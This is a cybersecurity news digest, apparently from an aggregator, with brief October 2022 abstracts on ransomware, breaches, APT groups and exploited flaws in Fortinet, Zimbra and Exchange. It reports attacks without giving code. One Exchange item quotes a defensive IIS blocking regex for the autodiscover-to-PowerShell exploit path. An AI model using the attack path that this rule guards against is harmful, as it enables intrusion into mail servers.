A new piece of research has detailed the increasingly sophisticated nature of the malware toolset employed by an advanced persistent threat (APT) group named Earth Aughisky . "Over the last decade, the group has continued to make adjustments in the tools and malware deployments on specific targets located in Taiwan and, more recently, Japan," Trend Micro disclosed in a technical profile last week. Earth Aughisky, also known as Taidoor , is a cyber espionage group that's known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in the network design and infrastructure for its own ends. While the Chinese threat actor has been known to primarily target organizations in Taiwan, victimology patterns observed towards late 2017 indicate an expansion to Japan. The most commonly targeted industry verticals include government, telcom, manufacturing, heavy, technology, transportation, and healthcare. Attack chains mounted by the groupThe Hacker News
October 10, 2022 – Vulnerabilities
CVE-2022-40684 flaw in Fortinet products is being exploited in the wild Full Text
Abstract
Fortinet has confirmed that the recently disclosed critical authentication bypass issue (CVE-2022-40684) is being exploited in the wild. Last week, Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted...Security Affairs
October 10, 2022 – Hacker
Hackers behind IcedID malware attacks diversify delivery tactics Full Text
Abstract
The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets.BleepingComputer
October 10, 2022 – Criminals
Egypt Leaks (EG) Group Spills Financial Information from Egyptian Banks Full Text
Abstract
New cybercriminal group Egypt Leaks has been targeting Egyptian financial institutions and leaking huge volumes of compromised payment data from major Egyptian banks on the dark web. The activity was first spotted in a Telegram channel created to leak Excel files carrying details of 12,229 cre ... Read MoreCyware Alerts - Hacker News
October 10, 2022 – Attack
New Report Uncovers Emotet’s Delivery and Evasion Techniques Used in Recent Attacks Full Text
Abstract
Threat actors associated with the notorious Emotet malware are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection, according to new research from VMware. Emotet is the work of a threat actor tracked as Mummy Spider (aka TA542), emerging in June 2014 as a banking trojan before morphing into an all-purpose loader in 2016 that's capable of delivering second-stage payloads such as ransomware. While the botnet's infrastructure was taken down as part of a coordinated law enforcement operation in January 2021, Emotet bounced back in November 2021 through another malware known as TrickBot . Emotet's resurrection, orchestrated by the now-defunct Conti team, has since paved the way for Cobalt Strike infections and, more recently, ransomware attacks involving Quantum and BlackCat . "The ongoing adaptation of Emotet's execution chain is one reason the malware has been successful for so long," researchers from VMwaThe Hacker News
October 10, 2022 – Hacker
Pro-Russia group KillNet targets US airports Full Text
Abstract
The pro-Russia hacktivist group 'KillNet' is behind massive DDoS attacks that hit websites of several major airports in the US. The pro-Russia hacktivist group 'KillNet' is claiming responsibility for massive distributed denial-of-service (DDoS) attacks...Security Affairs
October 10, 2022 – Breach
Toyota discloses data leak after access key exposed on GitHub Full Text
Abstract
Toyota Motor Corporation is warning that customers' personal information may have been exposed after an access key was publicly available on GitHub for almost five years.BleepingComputer
October 10, 2022 – Policy and Law
Biden signs order to implement E.U.-U.S. data privacy framework Full Text
Abstract
“U.S. and EU companies large and small across all sectors of the economy rely upon cross-border data flows to participate in the digital economy and expand economic opportunities,” the administration said in a press statement.NBC News
October 10, 2022 – Breach
Intel Confirms Leak of Alder Lake BIOS Source Code Full Text
Abstract
Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week. The published content contains Unified Extensible Firmware Interface ( UEFI ) code for Alder Lake , the company's 12th generation processors that was originally launched in November 2021. In a statement shared with Tom's Hardware, Intel said the leak doesn't expose "any new security vulnerabilities as we do not rely on obfuscation of information as a security measure." It's also encouraging the broader security research community to report any potential issues through its bug bounty program , adding it's reaching out to customers to notify them of the matter. Besides the UEFI code, the leaked data dump includes a plethora of files and tools, some of which appear to come from firmware vendor Insyde Software. Exact details surrounding the nature of the hack, incluThe Hacker News
October 10, 2022 – Government
The head of the Federal Cyber Security Authority (BSI) faces dismissal Full Text
Abstract
The German Interior Minister wants to dismiss the head of the Federal Cyber Security Authority (BSI), Arne Schoenbohm, due to possible contacts with Russian security services. German Interior Minister Nancy Faeser wants to dismiss the head of the Federal...Security Affairs
October 10, 2022 – Vulnerabilities
Fortinet says critical auth bypass bug is exploited in attacks Full Text
Abstract
Fortinet has confirmed today that a critical authentication bypass security vulnerability patched last week is being exploited in the wild.BleepingComputer
October 10, 2022 – Attack
Australian Firm Costa Group Suffers Phishing Attack Full Text
Abstract
Australian fruit and vegetable supplier Costa Group says it was subjected to a malicious and sophisticated phishing attack in August that resulted in unauthorized access to its servers.Bank Info Security
October 10, 2022 – Criminals
Hackers Steal $100 Million Cryptocurrency from Binance Bridge Full Text
Abstract
BNB Chain, a blockchain linked to the Binance cryptocurrency exchange, disclosed an exploit on a cross-chain bridge that drained around $100 million in digital assets. "There was an exploit affecting the native cross-chain bridge between BNB Beacon Chain (BEP2) and BNB Smart Chain (BEP20 or BSC), known as 'BSC Token Hub,'" it said last week. "The exploit was through a sophisticated forging of the low level proof into one common library." According to Binance CEO Changpeng Zhao, the exploit on the cross-chain bridge " resulted in extra BNB ," prompting a temporary suspension of the Binance Smart Chain (BSC). "BNB, which stands for 'Build and Build' (formerly called Binance Coin), is the blockchain gas token that 'fuels' transactions on BNB Chain," Binance noted earlier this February. No user funds are said to have been impacted, since the vulnerability in the BSC Token Hub bridge enabled the unknown threat actorThe Hacker News
October 10, 2022 – Outage
US airports’ sites taken down in DDoS attacks by pro-Russian hackers Full Text
Abstract
The pro-Russian hacktivist group 'KillNet' is claiming large-scale distributed denial-of-service (DDoS) attacks against the websites of several major airports in the U.S., making them unaccessible.BleepingComputer
October 10, 2022 – General
India: Cyber police asks Gurugram residents to be aware of 5G SIM fraud Full Text
Abstract
With the launch of 5G services in the city, police on Sunday issued an advisory asking residents to be careful of cyber criminals who might try to con them on the pretext of upgrading their SIM cards.Hindustan Times
October 10, 2022 – General
Board members should make CISOs their strategic partners Full Text
Abstract
A new Proofpoint report explores boards of directors’ perceptions about their key cybersecurity challenges and risks. 77% of participants agree cybersecurity is a top priority for their board and 76% discuss the topic at least monthly.Help Net Security
October 10, 2022 – Vulnerabilities
Android vulnerabilities could allow arbitrary code execution Full Text
Abstract
Several vulnerabilities have been patched in the Google Android operating system (OS), the most severe of which could allow for arbitrary code execution. None of the vulnerabilities have been spotted in the wild.Malwarebytes Labs
October 10, 2022 – Breach
Dark web carding site BidenCash gives 1.2M payment cards for free Full Text
Abstract
BidenCash, a popular dark web carding site, released a dump of more than 1.2 million credit cards to promote its service. Operators behind the popular dark web carding market 'BidenCash' have released a dump of 1,221,551 credit cards to promote their...Security Affairs
October 10, 2022 – General
India: Fake Aadhaar, PAN card printing websites use customers’ info for cyber fraud in Uttar Pradesh Full Text
Abstract
Hundreds of fake identity card-printing websites are operating out of Uttar Pradesh and duping people by using their personal information, according to a cybersecurity research firm.The Hindu
October 10, 2022 – Attack
Harvard Business Publishing licensee hit by ransomware Full Text
Abstract
Threat actors got to a database with over 152,000 customer records before its owner, the Turkish branch of Harvard Business Review, closed it. Crooks left a ransom note, threatening to leak the data and inform authorities of the EU’s General Data...Security Affairs
October 10, 2022 – Malware
Maggie Backdoor Eats Up Hundreds of SQL Servers Around the Globe Full Text
Abstract
A new malware strain named Maggie is targeting Microsoft SQL servers and has already backdoored hundreds of machines globally. The malware boasts simple TCP redirection functionality that can allow a remote hacker to connect to any IP address the infected MS-SQL server can reach. The malware’s capa ... Read MoreCyware Alerts - Hacker News
October 10, 2022 – Malware
RatMilad Spyware Attempts To Penetrate Middle Eastern Enterprises Full Text
Abstract
Mobile security firm Zimperium uncovered a new Android spyware, dubbed RatMilad, sneaking into users’ mobile devices for the Middle Eastern enterprises. Researchers have warned that the malware could be used by cybercriminals for numerous purposes ranging from cyberespionage to eavesdropping on vic ... Read MoreCyware Alerts - Hacker News
October 09, 2022 – Breach
Intel confirms leaked Alder Lake BIOS Source Code is authentic Full Text
Abstract
Intel has confirmed that a source code leak for the UEFI BIOS of Alder Lake CPUs is authentic and has been released by a third party.BleepingComputer
October 09, 2022 – Malware
Solana Phantom security update NFTs push password-stealing malware Full Text
Abstract
Hackers are airdropping NFTs to Solana cryptocurrency owners pretending to be alerts for a new Phantom security update that lead to the installation of password-stealing malware and the theft of cryptocurrency wallets.BleepingComputer
October 09, 2022 – Criminals
Darkweb market BidenCash gives away 1.2 million credit cards for free Full Text
Abstract
A dark web carding market named 'BidenCash' has released a massive dump of 1,221,551 credit cards to promote their marketplace, allowing anyone to download them for free to conduct financial fraud.BleepingComputer
October 9, 2022 – Criminals
Everest gang demands $200K for data stolen from South Africa state-owned electricity company ESKOM Full Text
Abstract
Everest ransomware operators claimed to have hacked South Africa state-owned company ESKOM Hld SOC Ltd. In March 2022, the Everest ransomware operators published a notice announcing the sale of "South Africa Electricity company's root access" for $125,000....Security Affairs
October 09, 2022 – Phishing
Fake adult sites push data wipers disguised as ransomware Full Text
Abstract
Malicious adult websites push fake ransomware which, in reality, acts as a wiper that quietly tries to delete almost all of the data on your device.BleepingComputer
October 9, 2022 – General
Security Affairs newsletter Round 387 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. BlackByte...Security Affairs
October 9, 2022 – Attack
CommonSpirit hospital chains hit by ransomware, patients are facing problems Full Text
Abstract
CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that impacted its operations. Common Spirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe...Security Affairs
October 9, 2022 – Attack
Lloyd’s of London investigates alleged cyber attack Full Text
Abstract
Lloyd's of London launched on Wednesday an investigating into a possible cyber attack after having detected unusual activity on its network. Lloyd's of London is investigating a cyberattack after detecting unusual network activity this week. In response...Security Affairs
October 08, 2022 – Hacker
Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite Full Text
Abstract
A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue. The shortcoming, assigned CVE-2022-41352 , carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected installations. "The vulnerability is due to the method ( cpio ) in which Zimbra's antivirus engine ( Amavis ) scans inbound emails," cybersecurity firm Rapid7 said in an analysis published this week. The issue is said to have been abused since early September 2022, according to details shared on Zimbra forums. While a fix is yet to be released, the software services company is urging users to install the "pax" utility and restart the Zimbra services. "If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is iThe Hacker News
October 08, 2022 – Vulnerabilities
Microsoft Issues Improved Mitigations for Unpatched Exchange Server Vulnerabilities Full Text
Abstract
Microsoft on Friday disclosed it has made more improvements to the mitigation method offered as a means to prevent exploitation attempts against the newly disclosed unpatched security flaws in Exchange Server. To that end, the tech giant has revised the blocking rule in IIS Manager from ".*autodiscover\.json.*Powershell.*" to "(?=.*autodiscover\.json)(?=.*powershell)." The list of updated steps to add the URL Rewrite rule is below - Open IIS Manager Select Default Web Site In the Feature View, click URL Rewrite In the Actions pane on the right-hand side, click Add Rule(s)… Select Request Blocking and click OK Add the string "(?=.*autodiscover\.json)(?=.*powershell)" (excluding quotes) Select Regular Expression under Using Select Abort Request under How to block and then click OK Expand the rule and select the rule with the pattern: (?=.*autodiscover\.json)(?=.*powershell) and click Edit under Conditions Change the Condition input from {UThe Hacker News
October 08, 2022 – Breach
ADATA denies RansomHouse cyberattack, says leaked data from 2021 breach Full Text
Abstract
Taiwanese chip maker ADATA denies claims of a RansomHouse cyberattack after the threat actors began posting the company's stolen files on their data leak site.BleepingComputer
October 8, 2022 – Criminals
LilithBot Malware and Eternity Project’s Cybercrime Operation Full Text
Abstract
The multi-function malware is being constantly developed by its operators who have added anti-VM checks and anti-debugging features too. LilithBot can steal cookies, screenshots, pictures, and browser history from infected systems.Cyware Alerts - Hacker News
October 08, 2022 – Phishing
Callback phishing attacks evolve their social engineering tactics Full Text
Abstract
The BazarCall malicious operation has evolved its social engineering methods, keeping the old fake charges lure for the first phase of the attack but then switching to pretending to help the victim deal with an infection or hack.BleepingComputer
October 8, 2022 – Vulnerabilities
GitHub Repositories Offer Fake Exploits for Exchange Flaws Full Text
Abstract
Microsoft and GTSC disclosed that scammers have jumped on the bandwagon to abuse Exchange flaws by creating GitHub repositories for fake exploits.Cyware Alerts - Hacker News
October 8, 2022 – Vulnerabilities
Researchers Uncover Details on Zero-Day Vulnerability Affecting Zimbra Collaboration and CPIO Full Text
Abstract
In September, an attack was reported in the Zimbra forums where a malicious actor was able to upload a JSP web shell into the public directory to execute a command, generating a pre-authentication key to login to an existing account.Security Boulevard
October 8, 2022 – Ransomware
BlackByte Ransomware abuses vulnerable driver to bypass security solutions Full Text
Abstract
The BlackByte ransomware operators are leveraging a flaw in a legitimate Windows driver to bypass security solutions. Researchers from Sophos warn that BlackByte ransomware operators are using a bring your own vulnerable driver (BYOVD) attack to bypass...Security Affairs
October 8, 2022 – Outage
Cyber Attack Suspected in Hartnell College Network Outage Full Text
Abstract
Hartnell College held an emergency meeting of its governing board this week to discuss the school’s ongoing network outage in response to a potential cybersecurity threat.Government Technology
October 8, 2022 – Vulnerabilities
Unpatched remote code execution flaw in Zimbra Collaboration Suite actively exploited Full Text
Abstract
Threat actors are exploiting an unpatched severe remote code execution vulnerability in the Zimbra collaboration platform. Researchers from Rapid7 are warning of the exploitation of unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352,...Security Affairs
October 8, 2022 – Attack
State Bar of Georgia Notifies Members and Employees of Cybersecurity Incident Full Text
Abstract
The State Bar of Georgia announced that it experienced a cybersecurity incident that resulted in unauthorized access to its systems. After learning of the incident, the State Bar worked to restore its systems safely and resume normal operations.Dark Reading
October 8, 2022 – Phishing
Toyota Warns Thousands of Customers That They May Get Scam Emails After Data Leak Full Text
Abstract
Around 296,000 pieces of customer information from the T-Connect service might have been leaked. Toyota released a statement warning its customers that they may be at risk of receiving phishing scams or unsolicited emails to their email addresses.Gizmodo
October 07, 2022 – Ransomware
The Week in Ransomware - October 7th 2022 - A 20 year sentence Full Text
Abstract
It was a very quiet week regarding ransomware news, with the most significant news being the sentencing of a Netwalker affiliate to 20-years in prison.BleepingComputer
October 7, 2022 – Vulnerabilities
New cryptojacking campaign exploits OneDrive vulnerability Full Text
Abstract
In a new development, cybersecurity software maker Bitdefender has detected a cryptojacking campaign that uses a Microsoft OneDrive vulnerability to gain persistence and run undetected on infected devices.CSO Online
October 07, 2022 – Vulnerabilities
Fortinet Warns of New Auth Bypass Flaw Affecting FortiGate and FortiProxy Full Text
Abstract
Fortinet has privately warned its customers of a security flaw affecting FortiGate firewalls and FortiProxy web proxies that could potentially allow an attacker to perform unauthorized actions on susceptible devices. Tracked as CVE-2022-40684 , the high-severity flaw relates to an authentication bypass vulnerability that could permit an unauthenticated adversary to perform arbitrary operations on the administrative interface. The issue impacts the following versions, and has been addressed in FortiOS versions 7.0.7 and 7.2.2 , and FortiProxy version 7.0.7 released this week - FortiOS - From 7.0.0 to 7.0.6 and from 7.2.0 to 7.2.1 FortiProxy - From 7.0.0 to 7.0.6 and 7.2.0 "Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade," the company cautioned in an alert shared by a security researcher named Gitworm on Twitter. When reached for a comment, FortineThe Hacker News
October 7, 2022 – Vulnerabilities
VMware fixed a high-severity bug in vCenter Server Full Text
Abstract
VMware this week addressed a severe vulnerability in vCenter Server that could lead to arbitrary code execution. VMware on Thursday released security patches to address a code execution vulnerability, tracked as CVE-2022-31680 (CVSS score of 7.2),...Security Affairs
October 07, 2022 – Breach
2K Games warns users their stolen data is now up for sale online Full Text
Abstract
Video game publisher 2K emailed users on Thursday to warn that some of their personal info was stolen and put up for sale online following a September 19 security breach.BleepingComputer
October 7, 2022 – Vulnerabilities
Fortinet urges customers to immediately fix a critical authentication bypass flaw in FortiGate and FortiProxy Full Text
Abstract
Customers that are not able to upgrade their systems should restrict access to their devices to a specific set of IP addresses. At this time it is not clear if the vulnerability has been actively exploited in attacks in the wild.Security Affairs
October 07, 2022 – Malware
Facebook Detects 400 Android and iOS Apps Stealing Users Log-in Credentials Full Text
Abstract
Meta Platforms on Friday disclosed that it had identified over 400 malicious apps on Android and iOS that it said targeted online users with the goal of stealing their Facebook login information. "These apps were listed on the Google Play Store and Apple's App Store and disguised as photo editors, games, VPN services, business apps, and other utilities to trick people into downloading them," the social media behemoth said in a report shared with The Hacker News. 42.6% of the rogue apps were photo editors, followed by business utilities (15.4%), phone utilities (14.1%), games (11.7%), VPNs (11.7%), and lifestyle apps (4.4%). Interestingly, a majority of the iOS apps posed as ads manager tools for Meta and its Facebook subsidiary. Besides concealing its malicious nature as a set of seemingly harmless apps, the operators of the scheme also published fake reviews that were designed to offset the negative reviews left by users who may have previously downloaded the appsThe Hacker News
October 7, 2022 – Vulnerabilities
Fortinet urges customers to immediately fix a critical authentication bypass flaw in FortiGate and FortiProxy Full Text
Abstract
Fortinet addressed a critical authentication bypass vulnerability that impacted FortiGate firewalls and FortiProxy web proxies. Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted FortiGate firewalls...Security Affairs
October 07, 2022 – Hacker
Hackers exploiting unpatched RCE bug in Zimbra Collaboration Suite Full Text
Abstract
Hackers are actively exploiting an unpatched remote code execution (RCE) vulnerability in Zimbra Collaboration Suite (ZCS), a widely deployed web client and email server.BleepingComputer
October 7, 2022 – Vulnerabilities
VMware Patches Code Execution Vulnerability in vCenter Server Full Text
Abstract
VMware announced patches for a vCenter Server vulnerability that could lead to arbitrary code execution. Tracked as CVE-2022-31680 (CVSS score: 7.2), its described as an unsafe deserialization vulnerability in the platform services controller (PSC).Security Week
October 07, 2022 – General
The essentials of GRC and cybersecurity — How they empower each other Full Text
Abstract
Understanding the connection between GRC and cybersecurity When talking about cybersecurity, Governance, Risk, and Compliance (GRC) is often considered the least exciting part of business protection. However, its importance can't be ignored, and this is why. While cybersecurity focuses on the technical side of protecting systems, networks, devices, and data, GRC is the tool that will help the entire organization understand and communicate how to do it. What does it mean? GRC tools like StandardFusion help companies define and implement the best practices, procedures, and governance to ensure everyone understands the risks associated with their actions and how they can affect business security, compliance, and success. In simple words, GRC is the medium for creating awareness around cybersecurity's best practices to reduce risks and achieve business goals. Why is cybersecurity more relevant than ever before Cybersecurity aims to protect sensitive business data, intelleThe Hacker News
October 7, 2022 – Cryptocurrency
Hacker stole $566 million worth of Binance Coins from Binance Bridge Full Text
Abstract
Threat actors have stolen 2 million Binance Coins (BNB), worth $566 million, from the popular Binance Bridge. Hackers have reportedly stolen $566 million worth of Binance Coins (BNB) from the Binance Bridge. It seems that threat actors were able...Security Affairs
October 07, 2022 – Vulnerabilities
Fortinet warns admins to patch critical auth bypass bug immediately Full Text
Abstract
Fortinet has warned administrators to update FortiGate firewalls and FortiProxy web proxies to the latest versions, which address a critical severity vulnerability.BleepingComputer
October 7, 2022 – Policy and Law
Meta Has Sued Chinese Companies for Stealing One Million WhatsApp Accounts Full Text
Abstract
Meta is suing the app developers, two Chinese and one Taiwanese, for orchestrating a massive fraud. The developers lured WhatsApp users to self-compromise their accounts.I Tech Post
October 07, 2022 – Malware
LofyGang Distributed ~200 Malicious NPM Packages to Steal Credit Card Data Full Text
Abstract
Multiple campaigns that distributed trojanized and typosquatted packages on the NPM open source repository have been identified as the work of a single threat actor dubbed LofyGang . Checkmarx said it discovered 199 rogue packages totaling thousands of installations, with the group operating for over a year with the goal of stealing credit card data as well as user accounts associated with Discord Nitro, gaming, and streaming services. "LofyGang operators are seen promoting their hacking tools in hacking forums, while some of the tools are shipped with a hidden backdoor," the software security company said in a report shared with The Hacker News prior to its publication. Various pieces of the attack puzzle have already been reported by JFrog , Sonatype , and Kaspersky (which called it LofyLife), but the latest analysis pulls the various operations together under one organizational umbrella that Checkmarx is referring to as LofyGang . Believed to be an organized crThe Hacker News
October 7, 2022 – Malware
LilithBot Malware, a new MaaS offered by the Eternity Group Full Text
Abstract
Researchers linked the threat actor behind the Eternity malware-as-a-service (MaaS) to a new malware strain called LilithBot. Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka...Security Affairs
October 07, 2022 – Hacker
LofyGang hackers built a credential-stealing enterprise on Discord, NPM Full Text
Abstract
A threat group using the name 'LofyGang', operating since 2020, is considered responsible for creating and distributing over 200 malicious packages on multiple code hosting platforms, including GitHub and NPM.BleepingComputer
October 7, 2022 – Phishing
Water Labbu Hijacks Crypto Transactions from Scam Websites Full Text
Abstract
Water Labbu, a new threat actor, was observed targeting cryptocurrency scam websites to steal cryptocurrency from the wallets of other scammers through malicious DApps. The profit made by the attacker is believed to be $316,728, looking at the transactions from nine victims. Experts suggest that us ... Read MoreCyware Alerts - Hacker News
October 07, 2022 – Vulnerabilities
Hackers Can Use ‘App Mode’ in Chromium Browsers’ for Stealth Phishing Attacks Full Text
Abstract
In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications." Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the address bar. According to security researcher mr.d0x – who also devised the browser-in-the-browser ( BitB ) attack method earlier this year – a bad actor can leverage this behavior to resort to some HTML/CSS trickery and display a fake address bar on top of the window and fool users into giving up their credentials on rogue login forms. "Although this technique is meant more towards internal phishing, you can technically still use it in an external phishing scenario," mr.d0x said . "You can deliver these fake applications independently as files." This isThe Hacker News
October 7, 2022 – Attack
Cyberattack Impacts City of Dunedin’s Email, Permit Payments, Utility Billing, and Inspection Scheduling Full Text
Abstract
Dunedin's water and wastewater facilities are secure, and city phones are working. However, city email, online payments for permits, inspection scheduling, utility billing, and Parks & Recreation programs, and Marina fees are all not working.USF
October 07, 2022 – Ransomware
BlackByte Ransomware Abuses Vulnerable Windows Driver to Disable Security Solutions Full Text
Abstract
In yet another case of bring your own vulnerable driver (BYOVD) attack, the operators of the BlackByte ransomware are leveraging a flaw in a legitimate Windows driver to bypass security solutions. "The evasion technique supports disabling a whopping list of over 1,000 drivers on which security products rely to provide protection," Sophos threat researcher Andreas Klopsch said in a new technical write-up. BYOVD is an attack technique that involves threat actors abusing vulnerabilities in legitimate, signed drivers to achieve successful kernel-mode exploitation and seize control of compromised machines. Weaknesses in signed drivers have been increasingly co-opted by nation-state threat groups in recent years, including Slingshot , InvisiMole , APT28 , and most recently, the Lazarus Group . BlackByte, believed to be an offshoot of the now-discontinued Conti group , is part of the big game cybercrime crews, which zeroes in on large, high-profile targets as part ofThe Hacker News
October 7, 2022 – Breach
Update: 2K warns users their info has been stolen following breach of its help desk Full Text
Abstract
2K warned users to remain on the lookout for suspicious activity across their accounts following a breach last month that allowed a threat actor to obtain email addresses, names, and other sensitive information provided to 2K's support team.ARS Technica
October 7, 2022 – APT
APT Groups Target U.S. Government Agencies with CovalentStealer Full Text
Abstract
The U.S. government alerted against state-backed hackers using the custom CovalentStealer malware and Impacket framework to steal confidential information from a Defense Industrial Base organization. To gain initial access through the victim’s network, the attackers attempted to exploit ProxyLogon ... Read MoreCyware Alerts - Hacker News
October 7, 2022 – Vulnerabilities
Critical flaw in open source WebPageTest remains unpatched Full Text
Abstract
In a blog post dated September 23, ManoMano researcher Louka “Laluka” Jacques-Chevallier discussed his discovery of a pre-authentication RCE vulnerability in the open-source project WebPageTest.The Daily Swig
October 06, 2022 – Criminals
Hacker steals $566 million worth of crypto from Binance Bridge Full Text
Abstract
Hackers have reportedly stolen 2 million Binance Coins (BNB), worth $566 million, from the Binance Bridge.BleepingComputer
October 6, 2022 – Malware
Detecting fileless malware infections is becoming easier Full Text
Abstract
Without memory analysis capabilities, security teams would be hard-pressed to identify fileless malware because it differs from traditional malware in how it breaches systems.Help Net Security
October 06, 2022 – Criminals
Eternity Group Hackers Offering New LilithBot Malware as a Service to Cybercriminals Full Text
Abstract
The threat actor behind the malware-as-a-service (MaaS) called Eternity has been linked to new piece of malware called LilithBot . "It has advanced capabilities to be used as a miner, stealer, and a clipper along with its persistence mechanisms," Zscaler ThreatLabz researchers Shatak Jain and Aditya Sharma said in a Wednesday report. "The group has been continuously enhancing the malware, adding improvements such as anti-debug and anti-VM checks." Eternity Project came on the scene earlier this year, advertising its warez and product updates on a Telegram channel. The services provided include a stealer, miner, clipper, ransomware, USB worm, and a DDoS bot. LilithBot is the latest addition to this list. Like its counterparts, the multifunctional malware bot is sold on a subscription basis to other cybercriminals in return for a cryptocurrency payment. Upon a successful compromise, the information gathered through the bot – browser history, cookies, pictuThe Hacker News
October 6, 2022 – General
Cybersecurity Regulation: It’s Not ‘Performance-Based’ If Outcomes Can’t Be Measured Full Text
Abstract
A closer look at the TSA’s cybersecurity directive for pipelines casts doubt on the applicability of “performance-based” regulation to cybersecurity. For now, policymakers have to combine management-based controls and technology-specific prescriptions.Lawfare
October 6, 2022 – Vulnerabilities
Watch out, a bug in Linux Kernel 5.19.12 can damage displays on Intel laptops Full Text
Abstract
A bug in Linux Kernel 5.19.12 that was released at the end of September 2022 can potentially damage the displays of Intel laptops. Linux users reported the displays of their Intel laptops rapidly blinking, flickering, and showing white flashes after...Security Affairs
October 06, 2022 – Government
FBI warns of disinformation threats before 2022 midterm elections Full Text
Abstract
The Federal Bureau of Investigation (FBI) warned today of foreign influence operations that might spread disinformation to affect the results of this year's midterm elections.BleepingComputer
October 6, 2022 – Vulnerabilities
Cisco fixed two high-severity bugs in Communications, Networking Products Full Text
Abstract
Cisco announced it has addressed high-severity vulnerabilities affecting some of its networking and communications products, including Enterprise NFV, Expressway, and TelePresence.Security Affairs
October 06, 2022 – Vulnerabilities
Details Released for Recently Patched new macOS Archive Utility Vulnerability Full Text
Abstract
Security researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that can bypass Apple's security measures. The vulnerability, tracked as CVE-2022-32910 , is rooted in the built-in Archive Utility and "could lead to the execution of an unsigned and unnotarized application without displaying security prompts to the user, by using a specially crafted archive," Apple device management firm Jamf said in an analysis. Following responsible disclosure on May 31, 2022, Apple addressed the issue as part of macOS Big Sur 11.6.8 and Monterey 12.5 released on July 20, 2022. The tech giant, for its part, also revised the earlier-issued advisories as of October 4 to add an entry for the flaw. Apple described the bug as a logic issue that could allow an archive file to get around Gatekeeper checks, which is designed so as to ensure that only trustedThe Hacker News
October 6, 2022 – Vulnerabilities
Cisco fixed two high-severity bugs in Communications, Networking Products Full Text
Abstract
Cisco fixed high-severity flaws in some of its networking and communications products, including Enterprise NFV, Expressway and TelePresence. Cisco announced it has addressed high-severity vulnerabilities affecting some of its networking and communications...Security Affairs
October 06, 2022 – Government
US govt shares top flaws exploited by Chinese hackers since 2020 Full Text
Abstract
NSA, CISA, and the FBI revealed today the top security vulnerabilities most exploited by hackers backed by the People's Republic of China (PRC) to target U.S. government and critical infrastructure networks.BleepingComputer
October 6, 2022 – General
When transparency is also obscurity: The conundrum that is open-source security Full Text
Abstract
A new report by Linux Foundation highlighted that the average number of days to fix a vulnerability is currently 97.8 – leaving enterprises running that open-source software open to attacks for many months.Help Net Security
October 06, 2022 – General
The Ultimate SaaS Security Posture Management Checklist, 2023 Edition Full Text
Abstract
It's been a year since the release of The Ultimate SaaS Security Posture Management (SSPM) Checklist. If SSPM is on your radar, here's the 2023 checklist edition, which covers the critical features and capabilities when evaluating a solution. The ease with which SaaS apps can be deployed and adopted today is remarkable, but it has become a double-edged sword. On the one hand, apps are quickly onboarded, employees can work from anywhere, and there is little need for operational management. On the other hand, there are pain points that stem from the explosion of SaaS app usage, explained by the "3 V" s: Volume: Each app can have hundreds of global settings. Multiply this number by thousands – or tens (or even hundreds) of thousands – of employees. Security teams must first be able to discover all the users who are using each application, as well as familiarize themselves with every application's specific set of rules and configurations, and ensure they are coThe Hacker News
October 6, 2022 – Breach
City of Tucson Data Breach impacted 123,500 individuals Full Text
Abstract
The City of Tucson, Arizona disclosed a data breach, the incident was discovered in May 2022 and impacted 123,500 individuals. The security breach was discovered at the end of May 2022 and concluded the investigation in September. According to the notification...Security Affairs
October 06, 2022 – Policy and Law
Meta sues app dev for stealing over 1 million WhatsApp accounts Full Text
Abstract
Meta has sued several Chinese companies doing business as HeyMods, Highlight Mobi, and HeyWhatsApp for developing and allegedly using "unofficial" WhatsApp Android apps to steal over one million WhatsApp accounts starting May 2022.BleepingComputer
October 6, 2022 – Government
Maryland Adds Directors of State, Local Cybersecurity Full Text
Abstract
Maryland added two new high-level cyber roles to the roster, appointing a director of state cybersecurity and director of local cybersecurity, the governor’s office announced. Both positions are part of the IT department and report to the state CISO.Government Technology
October 06, 2022 – Criminals
19-Year-Old Teen Arrested for Using Leaked Optus Breach Data in SMS Scam Full Text
Abstract
The Australian Federal Police (AFP) has arrested a 19-year-old teen from Sydney for allegedly attempting to leverage the data leaked following the Optus data breach late last month to extort victims. The suspect is said to have carried out a text message blackmail scam, demanding that the recipients transfer $2,000 to a bank account or risk getting their personal information misused for fraudulent activities. The source of the data, the agency said, was a sample database of 10,200 records that was posted briefly on a cybercrime forum accessible on the clearnet by an actor named "optusdata," before taking it down. Details of the scam were previously shared by 9News Australia reporter Chris O'Keefe on September 27, 2022. The AFP further said it executed a search warrant at the home of the offender, leading to the seizure of a mobile phone used to send the text messages to about 93 Optus customers. "At this stage it appears none of the individuals who received tThe Hacker News
October 6, 2022 – Breach
19-Year-Old man arrested for misusing leaked record from Optus Breach Full Text
Abstract
The Australian Federal Police (AFP) arrested a 19-year-old teen from Sydney for attempting to use data from the Optus data breach in SMS scams. The Australian Federal Police (AFP) has arrested a 19-year-old teen from Sydney for allegedly attempting...Security Affairs
October 06, 2022 – Policy and Law
Police arrest teen for using leaked Optus data to extort victims Full Text
Abstract
